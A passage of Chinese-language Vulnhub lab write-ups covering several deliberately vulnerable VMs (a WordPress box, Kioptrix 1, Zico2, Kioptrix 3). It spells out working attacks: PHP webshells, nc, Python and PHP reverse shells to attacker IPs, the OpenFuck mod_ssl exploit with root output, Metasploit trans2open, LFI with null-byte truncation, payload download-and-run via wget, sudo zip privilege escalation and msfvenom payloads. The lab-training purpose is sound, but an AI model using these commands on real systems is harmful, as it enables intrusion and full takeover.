referrerPolicy='no-referrer' /></p><p>(2)WordPress獲取shell的方法有多種,進入<code>Appearance  -> Editor</code>,點擊右邊的<code>Theme Header</code>,在編輯器里面插入一句話命令執行小馬<code><?php system($_GET['cmd']); ?></code>保存。</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3)在Burpsuit中通過cmd參數執行命令,訪問<code>172.20.10.8/backup_wordpress/?cmd=id;ls</code> 成功執行id和ls命令:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4)通過nc反彈shell 執行命令<code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.20.10.5 4444 >/tmp/f</code>,需將命令進行url編碼,然后在Burpsuit中發送:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5)Windows攻擊機開啟nc接收反彈shell成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(6)為查找和傳送文件方便,寫入菜刀馬<code>echo '<?php eval($_POST['123456']);?>' >> caidao.php</code> </p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>菜刀連接成功:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/20.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9917' class='md-header-anchor '></a>提升權限</h2><ul><li>0x5 查找用戶文件</li></ul><p>(1)查找每個用戶文件,和瀏覽各目錄文件,發現位於<code>/usr/local/bin/cleanup</code>文件,其權限是777,查看內容為:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/21.jpg' alt='' referrerPolicy='no-referrer' /></p><p><code>#!/bin/sh</code></p><p><code>rm -rf /var/log/apache2/*    # Clean those damn logs!!</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/22.jpg' alt='' referrerPolicy='no-referrer' /></p><p>這是一段清理Apache日志的腳本,需要root權限運行。</p><p>查看cleanup文件的權限為777,可以隨意修改和執行,可以將文件內容改成一個反彈shell。</p><p>(2)在菜刀中直接修改cleanup文件為反彈shell命令:因在<code>/usr/local/lib/python2.7/</code>目錄下安裝有Python2.7,所以可以使用Python反彈shell</p><p><code>python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.5",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/23.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3)Windows開啟NC,等待接收反彈shell,root權限:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4)查看flag:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/14/_image/25.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n9950' class='md-header-anchor '></a>思路總結</h2><h3><a name='header-n9951' class='md-header-anchor '></a>突破點和坑</h3><p>1.沒有突破點的時候,就嘗試暴破已知用戶名的密碼,字典采用國外密碼字段較好。</p><p>2.Linux反彈shell有多種姿勢,bash、nc、php、Python等都需要嘗試。</p><p>3.需熟悉WordPress后台getshell姿勢。</p><p>4.靶機作者提示有多種方法,肯定還有其他方法,本次滲透使用了暴破ssh用戶和WordPress滲透兩種方法。</p><p> </p><h1><a name='header-n9962' class='md-header-anchor '></a>第十三節 Kioptrix 1</h1><hr /><p>title: Vulnhub滲透測試練習-Kioptrix 1
date: 2018-05-07 15:28:05
categories: 筆記</p><h2><a name='header-n9965' class='md-header-anchor '></a>作者:Ukonw</h2><h2><a name='header-n9969' class='md-header-anchor '></a>信息收集</h2><p>通過<code>netdiscover</code>發現目標主機IP地址。</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">root@kali:~# netdiscover </span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text="">​</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> Currently scanning: 192.168.63.0/16   |   Screen View: Unique Hosts         </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">                                                                             </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180             </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> _____________________________________________________________________________</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> -----------------------------------------------------------------------------</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> 192.168.43.1    ac:c1:ee:31:3f:25      1      60  Xiaomi Communications Co L</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> 192.168.43.33   44:03:2c:68:d8:0f      1      60  Intel Corporate           </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> 192.168.43.54   00:0c:29:7c:3a:16      1      60  VMware, Inc.                     </span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 261px;"></div><div class="CodeMirror-gutters" style="display: none; height: 291px;"></div></div></div></pre><p>從掃描信息的得的目標主機的IP地址為<code>192.168.43.54</code></p><p>nmap 掃描IP的端口信息<code>nmap -A 192.168.43.54</code></p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -A -sS 192.168.43.54
 
Starting Nmap 7.10 ( https://nmap.org ) at 2018-05-07 15:48 
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.43.54
Host is up (0.00055s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after:  2010-09-26T09:32:06
|_ssl-date: 2018-05-07T07:50:42+00:00; +1m50s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:7C:3A:16 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
 
Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.43.54
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.99 seconds
</pre><p><code>443/tcp  open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)</code></p><p>443端口的服務<code>mod_ssl/2.8.4 OpenSSL/0.9.6b</code></p><p>通過<code>searchsploit mod_ssl</code>查詢相關漏洞</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~/Desktop# searchsploit mod_ssl
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Apache mod_ssl 2.0.x - Remote Denial o | exploits/linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAc | exploits/multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'Open | exploits/unix/remote/764.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0. | exploits/unix/remote/40347.txt
--------------------------------------- ----------------------------------------
Shellcodes: No Result
 
</pre><p>這里可以利用第4個漏洞的exp腳本進行攻擊,<code>exploit-db</code>下載相關exp。</p><h2><a name='header-n9987' class='md-header-anchor '></a>漏洞利用</h2><h3><a name='header-n9988' class='md-header-anchor '></a>OpenFuck漏洞利用</h3><p>這是一個遠程溢出的漏洞,下載的exp比較久遠需要做一些修改。</p><ul><li>編譯需要用的<code>libssl-dev</code>庫,且版本為<code>apt-get install libssl1.0-dev</code>
在exp中加入頭文件<code><openssl/rc4.h></code>和<code><openssl/md5.h></code>
    替換exp中的<code>wget</code>后的url為<code>http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c</code>
    第961行,修改為<code>const unsigned char * p,* end;</code></li></ul><p>然后編譯</p><pre class="md-fences mock-cm md-end-block" lang="">gcc -o OpenFuck 764.c -lcrypto
</pre><p>運行腳本<code>./OpenFuck</code>選擇相應我系統版本</p><p>這里選擇 0x6b</p><p>執行相關的命令<code>./OpenFuck 0x6b 192.168.43.54</code></p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~/Desktop# ./OpenFuck 0x6b 192.168.43.54
 
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
 
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f80e0
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$ 
bash-2.05$ unset HISTFILE; cd /tmp; wget http://dl.packetstormsecurity.net/030exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; 
--04:04:37--  http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80... connected!
HTTP request sent, awaiting response... 301 Moved Permanently
Location: https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c [following]
--04:04:38--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
 
    0K ...                                                   100% @   3.74 MB/s
 
04:04:39 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
 
[+] Attached to 6498
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
whoami
root
</pre><h3><a name='header-n10008' class='md-header-anchor '></a>Samba漏洞利用</h3><p>實驗環境是存在一個samba漏洞的,</p><p>這里用到<code>enum4linux</code>其利用SMB協議枚舉Windows系統和SAMBA服務,以此來獲得目標系統大量的重要信息,其枚舉結果可能包含目標系統的用戶帳號、組帳號、共享目錄、密碼策略等機密重要信息。</p><p>但我本地環境沒有檢測到samba的版本</p><p>該漏洞為<code>Samba trans2open溢出(Linux x86)</code>在Samba 2.2.0到2.2.8版本中發現的緩沖區溢出.</p><p>同樣可以在<code>searchsploit</code>查到</p><p>這里直接用msf環境進行實驗。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf exploit(linux/samba/trans2open) > show options 
 
Module options (exploit/linux/samba/trans2open):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.43.54   yes       The target address
   RPORT  139              yes       The target port (TCP)
 
 
Payload options (linux/x86/shell_bind_tcp):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.43.54   no        The target address
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce
 
msf exploit(linux/samba/trans2open) > exploit
 
[*] Started bind handler
[*] 192.168.43.54:139 - Trying return address 0xbffffdfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffcfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffbfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffafc...
[*] Command shell session 2 opened (192.168.43.177:33375 -> 192.168.43.54:4444) at 2018-05-07 04:47:42 -0400
 
id
uid=0(root) gid=0(root) groups=99(nobody)
</pre><h2><a name='header-n10023' class='md-header-anchor '></a>總結</h2><p>雖然說這個實驗環境比較老,一些漏洞可能在現實的實戰中是很少存在的。但是在這個漏洞利用的過程中可以學到一些<code>kali linux</code>的工具的利用和一些實戰的思路。</p><p> </p><h1><a name='header-n10028' class='md-header-anchor '></a>第十四節  Zico2</h1><hr /><p>title: Vulnhub滲透測試練習 - Zico2
date: 2018-05-05 22:30:35
categories: 筆記</p><h2><a name='header-n10031' class='md-header-anchor '></a>作者:Ukonw</h2><h2><a name='header-n10035' class='md-header-anchor '></a>vulnhub滲透環境</h2><h3><a name='header-n10036' class='md-header-anchor '></a>靶機地址</h3><p><a href='https://www.vulnhub.com/entry/zico2-1,210' target='_blank' class='url'>https://www.vulnhub.com/entry/zico2-1,210</a>/</p><h3><a name='header-n10039' class='md-header-anchor '></a>練習環境</h3><ul><li>Kali Linux 
VirtualBox</li></ul><h2><a name='header-n10045' class='md-header-anchor '></a>信息收集</h2><p>在信息收集之前需要獲取到靶機的IP地址,我靶機在VirtualBox下是<code>Host-Only</code>網絡模式,而靶機是無法直接進入系統看到IP地址的。</p><p>這里用到一個kali linux下的一個工具<code>netdiscover</code>基於ARP的網絡掃描工具。</p><p>直接執行命令<code>netdiscover</code>:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/QQ%E6%88%AA%E5%9B%BE20180505223944.png' alt='' referrerPolicy='no-referrer' /></p><p>這里我們獲取到兩個IP地址,測試發現正確的是<code>192.168.56.102</code></p><p>接下來用<code>nmap</code>掃描端口信息</p><p><code>nmap -A 192.168.56.102</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/QQ%E6%88%AA%E5%9B%BE20180505224409.png' alt='' referrerPolicy='no-referrer' /></p><p>得到80端口上運行着一個Web服務器。</p><p>訪問該Web服務,在這個時候我們可以用常見的掃描工具對網站進行掃描</p><h2><a name='header-n10066' class='md-header-anchor '></a>漏洞利用</h2><p>這里我簡單對頁面進行瀏覽,發現了一個文件包含漏洞。</p><pre class="md-fences mock-cm md-end-block" lang="">view.php?page=tools.html
</pre><p>嘗試包含<code>../../etc/passwd</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_1.png' alt='' referrerPolicy='no-referrer' /></p><p>成功包含,解下來就嘗試掃描目錄,因為校園網的原因,只能用<code>Host-Only</code>網絡模式進行測試,所以一切測試過程都在<code>Kali</code>下進行</p><p>這里嘗試去掃描網站的目錄,用到<code>kali</code>下的<code>dirb</code>專門用於爆破目錄的工具。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_2.png' alt='' referrerPolicy='no-referrer' /></p><p>得到一個<code>dbadmin</code>的目錄</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_3.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_4.png' alt='' referrerPolicy='no-referrer' /></p><p>這里用到的是一個叫<code>phpLiteAdmin</code>服務器應用,版本號為<code>v1.9.3</code></p><p>嘗試找找這個版本的歷史漏洞,這個服務是存在一個遠程PHP代碼注入漏洞的。</p><p>這里可以通過搜索引擎搜索相關漏洞詳情也可以用<code>kali</code>下的<code>Searchsploit</code>一個用於Exploit-DB的命令行搜索工具。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_5.png' alt='' referrerPolicy='no-referrer' /></p><p>這樣們就可以看到漏洞詳情,這里我們可以看到利用這個遠程PHP代碼注入漏洞需要登錄的。</p><p>所以嘗試默認密碼<code>admin</code>,發現可以直接登錄進去。</p><p>從<code>exploit-db</code>上的資料可以看出,我們需要創建一個數據庫,寫入一個shell。</p><p>這里可以用nc監聽端口來反彈shell,也可以用msf生成php目錄進行監聽。</p><p>按照<code>exploit-db</code>所說的建立數據庫。這里直接創建一個后綴名為<code>.php</code>的數據庫<code>shell</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_6.png' alt='' referrerPolicy='no-referrer' /></p><p>並添加表信息</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_7.png' alt='' referrerPolicy='no-referrer' /></p><p>這里在本地的<code>/var/www/html</code>目錄下創建txt文件</p><pre class="md-fences mock-cm md-end-block" lang=""><?php $sock=fsockopen("192.168.56.101",2333);exec("/bin/sh -i <&3 >&3 2>&3");?>
</pre><p>然后啟動apache web服務器</p><pre class="md-fences mock-cm md-end-block" lang="">service apache2 start
</pre><p>然后返回到數據庫中添加字段名,類型為<code>TEXT</code>,寫入PHP代碼來下載執行shell</p><pre class="md-fences mock-cm md-end-block" lang=""><?php system("wget 192.168.56.101/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?>
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_8.png' alt='' referrerPolicy='no-referrer' /></p><p>需要讓目標下載執行這串惡意代碼,需要一個HTTP請求。</p><p>這里我們就可以利用到之前發現的本地文件包含的漏洞了。</p><p>我們可以在數據庫中發現我們惡意創建的數據庫的路徑</p><pre class="md-fences mock-cm md-end-block" lang="">/usr/databases/shell.php
</pre><p>先用nc監聽我們之前設置的端口<code>2333</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_9.png' alt='' referrerPolicy='no-referrer' /></p><p>這里我們就可以反彈一個shell了。</p><h2><a name='header-n10134' class='md-header-anchor '></a>權限提升</h2><p>在反彈了shell后,對目錄進行檢查發現了</p><p>/home/zico中有一個<code>wordpress</code>目錄,是一個常見的CMS</p><p>進入查看wp-config.php文件。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_10.png' alt='' referrerPolicy='no-referrer' /></p><p>發現了用戶zico的登錄憑證,我們可以用<code>ssh</code>來連接。</p><pre class="md-fences mock-cm md-end-block" lang="">ssh zico@192.168.56.102
</pre><p>利用<code>sudo -l</code>查看目前用戶可執行與無法執行的指令;</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_11.png' alt='' referrerPolicy='no-referrer' /></p><p>這里表明當前用戶<code>zico</code>可以利用root權限無密碼執行<code>tar</code>和<code>zip</code>命令</p><p>這里可以利用<code>touch exploit</code>創建一個隨機文件,並用<code>zip</code>命令進行壓縮</p><pre class="md-fences mock-cm md-end-block" lang="">sudo zip exploit.zip exploit -T --unzip-command="python -c 'import pty; pty.spawn(\"/bin/sh\")'"
</pre><ul><li>sudo 用管理員權限執行
-T 檢查文件的完整性。這個參數可以讓他執行下一個參數 --unzip-command,在這個參數中寫入一個python的交互shell</li></ul><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_12.png' alt='' referrerPolicy='no-referrer' /></p><p>由此的到<code>root</code>權限,接下來就可以進入<code>/root</code>目錄了</p><p><code>cat /root/flag.txt</code>得到flag。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_13.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n10169' class='md-header-anchor '></a>總結</h2><ul><li>vulnhub里面有很多不同的環境提供滲透,第一次完成一次完整的滲透過程,學到了很多東西。
在文章的開頭用到了<code>kali linux</code>下的一個工具<code>netdiscover</code>基於ARP的網絡掃描工具。記得在一個師傅的面試經驗介紹中,他被面試官問到為什么要用arp去探測內網主機,他回答的是相當隱蔽,探測的信息更准確。主要是因為傳統探測遠程主機是否存活的方法是通過ICMP協議中的回顯應答報文來探測(ping)。很多主機為了避免被掃描器探測,通過防火牆將ICMP包屏蔽,從而達到在網絡中隱藏的目的。
    在文章中用到了兩種語言的交互shell。分別是php和python,這里參考老外的博客<a href='http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet'>Reverse Shell Cheat Sheet</a>
    對於我個人在提權實戰經驗方面是十分少的,在這次練習中學到了可以利用<code>touch exploit</code>創建一個隨機文件,並用<code>zip</code>命令進行壓縮,由此可見還是自己的實戰經驗太少了。
    最后感概下,英文的重要性。國外很多大牛的博客都是很豐富的,而對於一個英語四級425飄過的菜雞,我也是很無奈的。只能靠百度翻譯了。</li></ul><p> </p><h1><a name='header-n10180' class='md-header-anchor '></a>第十五節 Kioptrix 3</h1><hr /><p>title: Vulnhub滲透測試練習-Kioptrix 3
date: 2018-05-08 20:01:26
categories: 筆記</p><h2><a name='header-n10183' class='md-header-anchor '></a>作者:Ukonw</h2><h2><a name='header-n10187' class='md-header-anchor '></a>信息收集</h2><p>同樣用<code>netdiscover</code>發現目標主機。</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# netdiscover 
 
 Currently scanning: 192.168.194.0/16   |   Screen View: Unique Hosts          
                                                                                
 13 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 780              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.43.1    ac:c1:ee:31:3f:25      6     360  Xiaomi Communications Co Ltd
 192.168.43.33   44:03:2c:68:d8:0f      2     120  Intel Corporate             
 192.168.43.58   00:0c:29:b2:76:40      4     240  VMware, Inc.                
 192.168.43.158  00:0c:29:38:2d:6f      1      60  VMware, Inc. 
</pre><p>目標IP為<code>192.168.43.158</code>。</p><p>用nmap掃描目標主機端口信息。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -A -sS -n 192.168.43.158
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-08 07:45 EDT
Nmap scan report for 192.168.43.158
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms 192.168.43.158
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
 
</pre><p>由掃描信息可以得到</p><ul><li>22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
    OS details: Linux 2.6.9 - 2.6.33</li></ul><p> </p><p>80端口可以看出cms為<code>Lotus CMS</code>。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_4.png' alt='' referrerPolicy='no-referrer' /></p><p>用<code>dirb</code>掃描一下網站目錄。也可以用御劍掃描目錄。發現存在<code>phpdamin</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_5.png' alt='' referrerPolicy='no-referrer' /></p><p>cms后台<code>http://192.168.43.158/index.php?system=Admin</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_6.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n10218' class='md-header-anchor '></a>漏洞利用</h2><h3><a name='header-n10220' class='md-header-anchor '></a>文件包含&后台上傳</h3><p>訪問80端口上的WEB服務。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_1.png' alt='' referrerPolicy='no-referrer' /></p><p>發現url中有點問題</p><p><code>http://192.168.43.158/index.php?system=Blog</code></p><p>嘗試<code>system=../../../../../etc/passwd</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_2.png' alt='' referrerPolicy='no-referrer' /></p><p>好像不行,嘗試<code>%00.</code>截斷,發現可以讀到<code>/etc/passwd</code></p><p><code>http://192.168.43.158/index.php?system=../../../../../../../../etc/passwd%00.</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_3.png' alt='' referrerPolicy='no-referrer' /></p><p>這里可以結合后面SQLmap跑出來的后台密碼得到了一個shell。</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.177 LPORT=443 -f raw > /tmp/evil.jpg
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
</pre><p>用<code>msfvenom</code>生成一個圖片馬</p><p>我們在后台上傳圖片的地方上傳一個圖片</p><p>修改已有的圖片,並得到圖片的名,</p><p>利用msf監聽端口</p><p>利用文件包含,包含上傳圖片,這個地方比較雞肋。因為這個絕對路徑我們是得不到的。</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/index.php?system=../../../../../../../home/www/kioptrix3.com/gallery/photos/thumb_1a2o44437j.jpg%00.
</pre><p>訪問返回一個shell。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
